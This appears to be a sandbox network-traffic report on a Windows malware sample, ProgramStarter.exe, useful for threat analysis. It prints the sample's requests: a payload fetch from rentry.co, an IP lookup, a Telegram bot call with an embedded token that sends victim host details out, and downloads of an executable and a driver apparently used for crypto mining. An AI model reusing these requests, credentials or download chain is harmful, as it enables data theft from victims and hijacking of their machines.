                                                                                                                                                                                                                    Data Ascii: 55fb<!doctype html><html itemscope="" itemtype="http://schema.org/WebPage" lang="en-GB"><head><meta content="text/html; charset=UTF-8" http-equiv="Content-Type"><meta content="/images/branding/googleg/1x/googleg_standard_color_128dp.png" itemprop="image"><title>Google</title><script nonce="YAJTh2KuTMO_6kO4pQ432g">(function(){window.google={kEI:'n0YWZND1O9b2sAfA4afYDw',kEXPI:'0,18167,1341242,6058,207,4804,2316,383,246,5,1129120,1500962,77529,16111,28687,22430,1362,12319,17580,4998,13228,3847,38444,2872,2891,4139,7615,606,54144,6546,2614,13142,3,346,230,1014,1,5444,11472,2652,4,1528,2304,42125,13660,4437,9358,7428,5791,2566,4094,7596,1,42154,2,14022,2715,21266,1758,5679,1021,31121,4568,6259,23418,1246,5841,14968,4332,7484,27082,8155,6682,699,2,1478,14489,874,19634,6,1922,5604,180,3995,8213,4201,8976,389,2,1912,1246
                                                                                                                                                                                                                    Mar 19, 2023 00:17:52.040302992 CET8442INData Raw: 31 2c 32 35 32 33 2c 33 37 38 32 2c 32 30 31 39 38 2c 32 30 32 33 33 2c 32 39 33 32 2c 38 33 32 37 2c 38 39 32 2c 38 30 35 35 2c 31 36 32 32 2c 31 37 37 39 2c 36 36 39 2c 34 33 30 37 2c 31 37 34 36 2c 32 31 39 35 2c 34 34 33 37 2c 36 35 31 33 2c
                                                                                                                                                                                                                    Data Ascii: 1,2523,3782,20198,20233,2932,8327,892,8055,1622,1779,669,4307,1746,2195,4437,6513,8481,991,2265,765,426,2608,3076,1411,890,160,2093,5152,1295,509,7553,181,495,1150,1093,269,1380,108,96,1031,427,23,6711,6317,5674,589,536,1249,111,556,2,427,2899
                                                                                                                                                                                                                    Mar 19, 2023 00:17:52.040323019 CET8443INData Raw: 3b 63 3d 63 7c 7c 22 2f 22 2b 28 67 7c 7c 22 67 65 6e 5f 32 30 34 22 29 2b 22 3f 61 74 79 70 3d 69 26 63 74 3d 22 2b 61 2b 22 26 63 61 64 3d 22 2b 62 2b 65 2b 22 26 7a 78 3d 22 2b 44 61 74 65 2e 6e 6f 77 28 29 2b 64 3b 2f 5e 68 74 74 70 3a 2f 69
                                                                                                                                                                                                                    Data Ascii: ;c=c||"/"+(g||"gen_204")+"?atyp=i&ct="+a+"&cad="+b+e+"&zx="+Date.now()+d;/^http:/i.test(c)&&"https:"===window.location.protocol&&(google.ml&&google.ml(Error("a"),!1,{src:c,glmm:1}),c="");return c};h=google.kEI;google.getEI=l;google.getLEI=m;go
                                                                                                                                                                                                                    Mar 19, 2023 00:17:52.040344000 CET8445INData Raw: 4e 61 6d 65 29 7b 61 3d 22 31 22 3d 3d 3d 61 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 6e 6f 68 72 65 66 22 29 3b 62 72 65 61 6b 20 61 7d 61 3d 21 31 7d 61 26 26 62 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 7d 2c 21 30
                                                                                                                                                                                                                    Data Ascii: Name){a="1"===a.getAttribute("data-nohref");break a}a=!1}a&&b.preventDefault()},!0);}).call(this);</script><style>#gb{font:13px/27px Arial,sans-serif;height:30px}#gbz,#gbg{position:absolute;white-space:nowrap;top:0;height:30px;z-index:1000}#gb
                                                                                                                                                                                                                    Mar 19, 2023 00:17:52.040363073 CET8446INData Raw: 7d 2e 67 62 74 6f 20 2e 67 62 6d 2c 2e 67 62 74 6f 20 23 67 62 73 7b 74 6f 70 3a 32 39 70 78 3b 76 69 73 69 62 69 6c 69 74 79 3a 76 69 73 69 62 6c 65 7d 23 67 62 7a 20 2e 67 62 6d 7b 6c 65 66 74 3a 30 7d 23 67 62 67 20 2e 67 62 6d 7b 72 69 67 68
                                                                                                                                                                                                                    Data Ascii: }.gbto .gbm,.gbto #gbs{top:29px;visibility:visible}#gbz .gbm{left:0}#gbg .gbm{right:0}.gbxms{background-color:#ccc;display:block;position:absolute;z-index:1;top:-1px;left:-2px;right:-2px;bottom:-2px;opacity:.4;-moz-border-radius:3px;filter:pro
                                                                                                                                                                                                                    Mar 19, 2023 00:17:52.040383101 CET8447INData Raw: 7b 62 6f 72 64 65 72 2d 6c 65 66 74 3a 31 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 62 6f 72 64 65 72 2d 72 69 67 68 74 3a 31 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 64 69 73 70 6c 61 79 3a 62 6c 6f 63
                                                                                                                                                                                                                    Data Ascii: {border-left:1px solid transparent;border-right:1px solid transparent;display:block;*display:inline-block;padding:0 5px;position:relative;z-index:1000}.gbts{*display:inline}.gbzt .gbts{display:inline;zoom:1}.gbto .gbts{background:#fff;border-c
                                                                                                                                                                                                                    Mar 19, 2023 00:17:52.040405035 CET8449INData Raw: 20 2e 67 62 74 73 7b 70 61 64 64 69 6e 67 3a 32 39 70 78 20 35 70 78 20 31 70 78 3b 2a 70 61 64 64 69 6e 67 3a 32 37 70 78 20 35 70 78 20 31 70 78 7d 23 67 62 69 34 69 2c 23 67 62 69 34 69 64 7b 6c 65 66 74 3a 35 70 78 3b 62 6f 72 64 65 72 3a 30
                                                                                                                                                                                                                    Data Ascii: .gbts{padding:29px 5px 1px;*padding:27px 5px 1px}#gbi4i,#gbi4id{left:5px;border:0;height:24px;position:absolute;top:1px;width:24px}.gbto #gbi4i,.gbto #gbi4id{top:3px}.gbi4p{display:block;width:24px}#gbi4id{background-position:-44px -101px}#gb
                                                                                                                                                                                                                    Mar 19, 2023 00:17:52.040426970 CET8450INData Raw: 20 31 30 70 78 7d 2e 67 62 6d 6c 31 2d 68 76 72 2c 2e 67 62 6d 6c 31 3a 66 6f 63 75 73 7b 6f 75 74 6c 69 6e 65 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 7d 23 67
                                                                                                                                                                                                                    Data Ascii: 10px}.gbml1-hvr,.gbml1:focus{outline:none;text-decoration:underline !important}#gbpm .gbml1{display:inline;margin:0;padding:0;white-space:nowrap}.gbmlb,.gbmlb:visited{line-height:27px}.gbmlb-hvr,.gbmlb:focus{outline:none;text-decoration:under
                                                                                                                                                                                                                    Mar 19, 2023 00:17:52.040447950 CET8451INData Raw: 6e 67 2d 72 69 67 68 74 3a 35 30 70 78 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 74 6f 70 7d 23 67 62 64 34 20 2e 67 62 70 63 7b 2a 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 7d 2e 67 62 70 63 20 2e 67 62 70 73 2c 2e 67 62 70 63 20 2e 67 62
                                                                                                                                                                                                                    Data Ascii: ng-right:50px;vertical-align:top}#gbd4 .gbpc{*display:inline}.gbpc .gbps,.gbpc .gbps2{display:block;margin:0 20px}#gbmplp.gbps{margin:0 10px}.gbpc .gbps{color:#000;font-weight:bold}.gbpc .gbpd{margin-bottom:5px}.gbpd .gbmt,.gbpd .gbps{color:#6
                                                                                                                                                                                                                    Mar 19, 2023 00:17:52.040497065 CET8453INData Raw: 69 67 68 74 3a 34 38 70 78 3b 77 69 64 74 68 3a 34 38 70 78 7d 2e 67 62 6d 70 6e 77 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 3b 76 65 72 74 69 63
                                                                                                                                                                                                                    Data Ascii: ight:48px;width:48px}.gbmpnw{display:inline-block;height:auto;margin:10px 0;vertical-align:top}.gbqfb,.gbqfba,.gbqfbb{-moz-border-radius:2px;-webkit-border-radius:2px;border-radius:2px;cursor:default !important;display:inline-block;font-weigh
                                                                                                                                                                                                                    Mar 19, 2023 00:17:52.061656952 CET8454INData Raw: 69 64 20 23 64 63 64 63 64 63 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 72 67 62 61 28 30 2c 30 2c 30 2c 2e 31 29 3b 63 6f 6c 6f 72 3a 23 34 34 34 20 21 69 6d 70 6f 72 74 61 6e 74 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 31 70 78 7d 2e 67 62 71 66 62
                                                                                                                                                                                                                    Data Ascii: id #dcdcdc;border-color:rgba(0,0,0,.1);color:#444 !important;font-size:11px}.gbqfb{background-color:#4d90fe;background-image:-webkit-gradient(linear,left top,left bottom,from(#4d90fe),to(#4787ed));background-image:-webkit-linear-gradient(top,#


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                    2192.168.2.349687149.154.167.220443C:\Users\user\AppData\Local\Temp\ProgramStarter.exe
                                                                                                                                                                                                                    TimestampkBytes transferredDirectionData


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                    3192.168.2.349688140.82.121.3443C:\Users\user\AppData\Local\Temp\ProgramStarter.exe
                                                                                                                                                                                                                    TimestampkBytes transferredDirectionData


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                    4192.168.2.349689140.82.121.3443C:\Users\user\AppData\Local\Temp\ProgramStarter.exe
                                                                                                                                                                                                                    TimestampkBytes transferredDirectionData


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                    5192.168.2.349690185.199.111.133443C:\Users\user\AppData\Local\Temp\ProgramStarter.exe
                                                                                                                                                                                                                    TimestampkBytes transferredDirectionData


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                    6192.168.2.349691185.199.111.133443C:\Users\user\AppData\Local\Temp\ProgramStarter.exe
                                                                                                                                                                                                                    TimestampkBytes transferredDirectionData


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                    7192.168.2.349692198.251.88.130443C:\Users\user\AppData\Local\Temp\ProgramStarter.exe
                                                                                                                                                                                                                    TimestampkBytes transferredDirectionData


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                    8192.168.2.349694198.251.88.130443C:\Users\user\AppData\Local\Temp\ProgramStarter.exe
                                                                                                                                                                                                                    TimestampkBytes transferredDirectionData


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                    9192.168.2.349698198.251.88.130443C:\Users\user\AppData\Local\Temp\ProgramStarter.exe
                                                                                                                                                                                                                    TimestampkBytes transferredDirectionData


                                                                                                                                                                                                                    HTTPS Proxied Packets

                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                    0192.168.2.349685198.251.88.130443C:\Users\user\AppData\Local\Temp\ProgramStarter.exe
                                                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                    2023-03-18 23:17:12 UTC0OUTGET /ptvejbuqtrwjccinhzedhttxvtbtyxuk/raw HTTP/1.1
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0
                                                                                                                                                                                                                    Host: rentry.co
                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                    2023-03-18 23:17:12 UTC0INHTTP/1.1 200 OK
                                                                                                                                                                                                                    Date: Sat, 18 Mar 2023 23:17:12 GMT
                                                                                                                                                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                                                    Content-Length: 2114
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                    Cache-Control:
                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                    2023-03-18 23:17:12 UTC0INData Raw: 41 49 6f 42 38 70 66 79 6c 31 53 6d 6e 42 6c 6a 51 61 35 32 68 51 33 70 73 2b 2b 37 4a 4b 6a 4a 6c 77 33 46 68 36 36 4b 55 2f 58 74 5a 77 53 34 32 4d 4d 73 76 76 41 51 6f 4e 6f 70 31 6c 2f 58 2b 46 6a 49 76 45 4e 75 33 69 68 59 31 35 63 38 76 6b 57 4d 72 52 72 6f 51 61 57 38 77 6f 4a 76 41 35 69 67 65 72 69 61 50 6e 46 56 41 38 46 33 63 33 66 30 4a 2b 46 48 45 65 75 73 7a 30 50 50 64 74 47 58 72 72 6d 54 37 68 76 4f 0a 43 57 63 4a 33 30 4e 4d 54 47 43 35 78 68 65 6f 51 4b 4c 69 65 4d 79 65 6d 38 67 36 66 79 52 48 61 44 39 44 6b 49 4d 47 6b 58 72 48 68 64 4a 42 44 78 37 35 63 41 37 75 67 57 44 56 6b 46 55 46 5a 2f 70 78 41 33 58 47 33 2b 53 4e 73 39 72 44 2b 71 50 49 6a 74 70 6c 39 45 46 4d 67 76 57 6c 39 4a 53 55 33 70 68 4a 6c 6c 6c 63 59 43 2b 46 55 65
                                                                                                                                                                                                                    Data Ascii: AIoB8pfyl1SmnBljQa52hQ3ps++7JKjJlw3Fh66KU/XtZwS42MMsvvAQoNop1l/X+FjIvENu3ihY15c8vkWMrRroQaW8woJvA5igeriaPnFVA8F3c3f0J+FHEeusz0PPdtGXrrmT7hvOCWcJ30NMTGC5xheoQKLieMyem8g6fyRHaD9DkIMGkXrHhdJBDx75cA7ugWDVkFUFZ/pxA3XG3+SNs9rD+qPIjtpl9EFMgvWl9JSU3phJlllcYC+FUe


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                    1192.168.2.349686104.237.62.211443C:\Users\user\AppData\Local\Temp\ProgramStarter.exe
                                                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                    2023-03-18 23:17:13 UTC2OUTGET / HTTP/1.1
                                                                                                                                                                                                                    Host: api.ipify.org
                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                    2023-03-18 23:17:13 UTC2INHTTP/1.1 200 OK
                                                                                                                                                                                                                    Content-Length: 10
                                                                                                                                                                                                                    Content-Type: text/plain
                                                                                                                                                                                                                    Date: Sat, 18 Mar 2023 23:17:13 GMT
                                                                                                                                                                                                                    Vary: Origin
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    2023-03-18 23:17:13 UTC2INData Raw: 38 34 2e 31 37 2e 35 32 2e 39
                                                                                                                                                                                                                    Data Ascii: 84.17.52.9


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                    2192.168.2.349687149.154.167.220443C:\Users\user\AppData\Local\Temp\ProgramStarter.exe
                                                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                    2023-03-18 23:17:14 UTC2OUTGET /bot5940677858:AAGt9oE-xpZH11vE2TJLSl03-c0zzlh0DWk/sendMessage?chat_id=-1001719155419&text=%F0%9F%94%B9New%20Worker:%0A%20%20%E2%8A%A2%20ID:%20171010202%0A%20%20%E2%8A%A2%20IP:%2084.17.52.9%0A%20%20%E2%8A%A2%20405464%0A%20%20%E2%88%9F%20Microsoft%20Windows%2010%20Pro%0A%F0%9F%94%B8Hardware:%0A%20%20%E2%8A%A2%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0A%20%20%E2%88%9F%20V33ZTS67 HTTP/1.1
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0
                                                                                                                                                                                                                    Host: api.telegram.org
                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                    2023-03-18 23:17:14 UTC3INHTTP/1.1 200 OK
                                                                                                                                                                                                                    Server: nginx/1.18.0
                                                                                                                                                                                                                    Date: Sat, 18 Mar 2023 23:17:14 GMT
                                                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                                                    Content-Length: 464
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                                                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                                                                                                    2023-03-18 23:17:14 UTC3INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 37 30 30 31 2c 22 73 65 6e 64 65 72 5f 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 31 30 30 31 37 31 39 31 35 35 34 31 39 2c 22 74 69 74 6c 65 22 3a 22 4d 69 6e 65 22 2c 22 74 79 70 65 22 3a 22 63 68 61 6e 6e 65 6c 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 2d 31 30 30 31 37 31 39 31 35 35 34 31 39 2c 22 74 69 74 6c 65 22 3a 22 4d 69 6e 65 22 2c 22 74 79 70 65 22 3a 22 63 68 61 6e 6e 65 6c 22 7d 2c 22 64 61 74 65 22 3a 31 36 37 39 31 38 31 34 33 34 2c 22 74 65 78 74 22 3a 22 5c 75 64 38 33 64 5c 75 64 64 33 39 4e 65 77 20 57 6f 72 6b 65 72 3a 5c 6e 20 20 5c 75 32 32 61 32 20 49 44 3a 20 31 37 31 30 31 30 32 30 32 5c 6e 20 20 5c 75 32 32 61 32 20 49 50 3a
                                                                                                                                                                                                                    Data Ascii: {"ok":true,"result":{"message_id":7001,"sender_chat":{"id":-1001719155419,"title":"Mine","type":"channel"},"chat":{"id":-1001719155419,"title":"Mine","type":"channel"},"date":1679181434,"text":"\ud83d\udd39New Worker:\n \u22a2 ID: 171010202\n \u22a2 IP:


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                    3192.168.2.349688140.82.121.3443C:\Users\user\AppData\Local\Temp\ProgramStarter.exe
                                                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                    2023-03-18 23:17:21 UTC3OUTGET /ETHMonsterM/ETHMonsterM/raw/main/cpm.exe HTTP/1.1
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0
                                                                                                                                                                                                                    Host: github.com
                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                    2023-03-18 23:17:21 UTC7INHTTP/1.1 302 Found
                                                                                                                                                                                                                    Server: GitHub.com
                                                                                                                                                                                                                    Date: Sat, 18 Mar 2023 23:17:21 GMT
                                                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                    Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                                                                                                                    Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                                                                                                                                                                    Location: https://raw.githubusercontent.com/ETHMonsterM/ETHMonsterM/main/cpm.exe
                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                                                                                    X-Frame-Options: deny
                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                                                    Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                    2023-03-18 23:17:21 UTC7INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                                                                                                                                                    Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.
                                                                                                                                                                                                                    2023-03-18 23:17:21 UTC9INData Raw: 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 58 2d 47 69 74 48 75 62 2d 52 65 71 75 65 73 74 2d 49 64 3a 20 44 30 33 43 3a 34 32 35 39 3a 37 42 44 37 31 31 36 3a 37 46 44 30 42 39 30 3a 36 34 31 36 34 36 38 31 0d 0a 63 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a
                                                                                                                                                                                                                    Data Ascii: Content-Length: 0X-GitHub-Request-Id: D03C:4259:7BD7116:7FD0B90:64164681connection: close


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                    4192.168.2.349689140.82.121.3443C:\Users\user\AppData\Local\Temp\ProgramStarter.exe
                                                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                    2023-03-18 23:17:21 UTC4OUTGET /ETHMonsterM/ETHMonsterM/raw/main/wnnrg.sys HTTP/1.1
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0
                                                                                                                                                                                                                    Host: github.com
                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                    2023-03-18 23:17:21 UTC4INHTTP/1.1 302 Found
                                                                                                                                                                                                                    Server: GitHub.com
                                                                                                                                                                                                                    Date: Sat, 18 Mar 2023 23:17:21 GMT
                                                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                    Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                                                                                                                    Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                                                                                                                                                                    Location: https://raw.githubusercontent.com/ETHMonsterM/ETHMonsterM/main/wnnrg.sys
                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                                                                                    X-Frame-Options: deny
                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                                                    Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                    2023-03-18 23:17:21 UTC4INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                                                                                                                                                    Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.
                                                                                                                                                                                                                    2023-03-18 23:17:21 UTC6INData Raw: 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 58 2d 47 69 74 48 75 62 2d 52 65 71 75 65 73 74 2d 49 64 3a 20 44 30 33 41 3a 39 41 43 45 3a 37 44 38 46 35 32 31 3a 38 31 37 35 41 31 30 3a 36 34 31 36 34 36 38 31 0d 0a 63 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a
                                                                                                                                                                                                                    Data Ascii: Content-Length: 0X-GitHub-Request-Id: D03A:9ACE:7D8F521:8175A10:64164681connection: close


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                    5192.168.2.349690185.199.111.133443C:\Users\user\AppData\Local\Temp\ProgramStarter.exe
                                                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                    2023-03-18 23:17:21 UTC6OUTGET /ETHMonsterM/ETHMonsterM/main/wnnrg.sys HTTP/1.1
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0
                                                                                                                                                                                                                    Host: raw.githubusercontent.com
                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC10INHTTP/1.1 200 OK
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    Content-Length: 14544
                                                                                                                                                                                                                    Cache-Control: max-age=300
                                                                                                                                                                                                                    Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                                                                                                    ETag: "eb6132670d71c0f0a0135281e09093ea8d3b37b755ef8f0c099eb8d539a74073"
                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                    X-Frame-Options: deny
                                                                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                    X-GitHub-Request-Id: C99C:ACB3:2BF89C0:2DD333C:64164681
                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                    Date: Sat, 18 Mar 2023 23:17:22 GMT
                                                                                                                                                                                                                    Via: 1.1 varnish
                                                                                                                                                                                                                    X-Served-By: cache-mxp6928-MXP
                                                                                                                                                                                                                    X-Cache: MISS
                                                                                                                                                                                                                    X-Cache-Hits: 0
                                                                                                                                                                                                                    X-Timer: S1679181442.901240,VS0,VE149
                                                                                                                                                                                                                    Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                                                    X-Fastly-Request-ID: f0e93369aae1955644c82cc0a0e7150e22efb4bb
                                                                                                                                                                                                                    Expires: Sat, 18 Mar 2023 23:22:22 GMT
                                                                                                                                                                                                                    Source-Age: 0
                                                                                                                                                                                                                    2023-03-18 23:17:22 UTC10INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 35 3a 6e fc 71 5b 00 af 71 5b 00 af 71 5b 00 af 71 5b 01 af 7d 5b 00 af 56 9d 7b af 74 5b 00 af 56 9d 7d af 70 5b 00 af 56 9d 6d af 72 5b 00 af 56 9d 71 af 70 5b 00 af 56 9d 7c af 70 5b 00 af 56 9d 78 af 70 5b 00 af 52 69 63 68 71 5b 00 af 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 c1 26 8b 48 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 08 00 00 0c 00
                                                                                                                                                                                                                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$5:nq[q[q[q[}[V{t[V}p[Vmr[Vqp[V|p[Vxp[Richq[PEd&H"
